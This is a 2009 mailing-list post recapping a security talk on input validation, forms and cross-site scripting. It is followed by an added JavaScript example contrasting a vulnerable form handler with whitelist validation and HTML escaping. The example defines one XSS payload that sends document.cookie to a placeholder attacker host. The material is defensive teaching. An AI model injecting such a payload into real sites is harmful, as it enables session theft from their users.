[Security] Notes from last night's security talk

aestetix aestetix aestetix at gmail.com
Fri Oct 23 13:50:53 UTC 2009


I figured I should post this before I forget.

We covered the fundamentals: what input validation is, and the basic
relationship between a client and a server.

Next, showed how HTML forms work, and how you can use server response from
forms to manipulate data. Used this to explain cross site scripting.

Then went over what happens when you bring JavaScript into the mix, and gave
some scary (or funny) examples of stuff that really happened.

Covered basic security resolutions: whitelisting (hash tables, regex,
dictionaries...), NoScript, and a few other things.

A few good resources for those who attended (or those who missed):

Tools of the trade: LiveHTTPHeaders, NoScript, Web Developer Toolkit, Paros
Proxy, Burp Suite
Names to follow: Jeremiah Grossman, Billy Hoffman, RSnake
Sites to check out: gnucitizen.org, ha.ckers.org

I'll be out of town next week. Anyone feel like giving a talk or workshop?
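The form-echo-to-XSS chain and the whitelisting fix sketched in the post, as an added example that is not part of the original message or the talk. It models a server-side form handler as plain functions with no framework: a handler that concatenates the submitted field straight into the page, then the same handler with a regex whitelist on the field and HTML entity escaping on output. The field names, the hostname in the payload, and the username pattern are all assumptions made for the illustration.

```javascript
// Added example (not from the original post): a minimal model of a form
// handler that echoes a submitted field back into HTML. First the way that
// enables reflected cross-site scripting, then with the two defences the
// talk mentioned: whitelist validation and output escaping. The "request"
// is just a string argument; no HTTP server is involved.

// Vulnerable: the submitted value is concatenated straight into the page,
// so anything the browser parses as markup in it runs as part of the site.
function renderGreetingUnsafe(name) {
  return `<html><body><h1>Hello, ${name}!</h1></body></html>`;
}

// Defence 1: whitelist validation. Only accept what the field is supposed
// to contain (assumed here: a username of 1-32 letters, digits or
// underscores). Anything else is rejected before it reaches the page.
const USERNAME_RE = /^[A-Za-z0-9_]{1,32}$/;
function isValidUsername(name) {
  return typeof name === 'string' && USERNAME_RE.test(name);
}

// Defence 2: output encoding. Characters with meaning in HTML text and
// attribute contexts become entities, so the browser shows them as text
// instead of parsing them as markup.
function escapeHtml(s) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '`': '&#x60;',
  };
  return String(s).replace(/[&<>"'`]/g, (c) => map[c]);
}

// Hardened greeting: whitelist first, and still escape on output, because
// a later change to the whitelist should not silently reopen the hole.
function renderGreetingSafe(name) {
  if (!isValidUsername(name)) {
    return '<html><body><p>Invalid username.</p></body></html>';
  }
  return `<html><body><h1>Hello, ${escapeHtml(name)}!</h1></body></html>`;
}

// Free-text fields (a comment box, say) cannot be whitelisted down to a
// narrow pattern, so for those the escaping alone carries the weight.
function renderCommentSafe(comment) {
  return `<html><body><p>${escapeHtml(comment)}</p></body></html>`;
}

// Constructed payload of the kind an attacker puts in a link whose target
// echoes the parameter; evil.example is a placeholder, not a real host.
const PAYLOAD =
  '<script>document.location="http://evil.example/?c="+document.cookie</script>';

// Crude check for the demo: does the rendered page contain a live <script>
// element? A real browser would execute it rather than just match it.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe page runs payload:', containsScriptTag(renderGreetingUnsafe(PAYLOAD)));
  console.log('safe page runs payload:  ', containsScriptTag(renderGreetingSafe(PAYLOAD)));
  console.log('escaped comment:', renderCommentSafe(PAYLOAD));
}
```

Whitelisting and escaping do different jobs: the regex decides what the application is willing to accept at all, while the entity encoding decides how an accepted value is rendered. The second one is the one that must never be skipped, since a whitelist written for one field is routinely copied to a field where it is too loose.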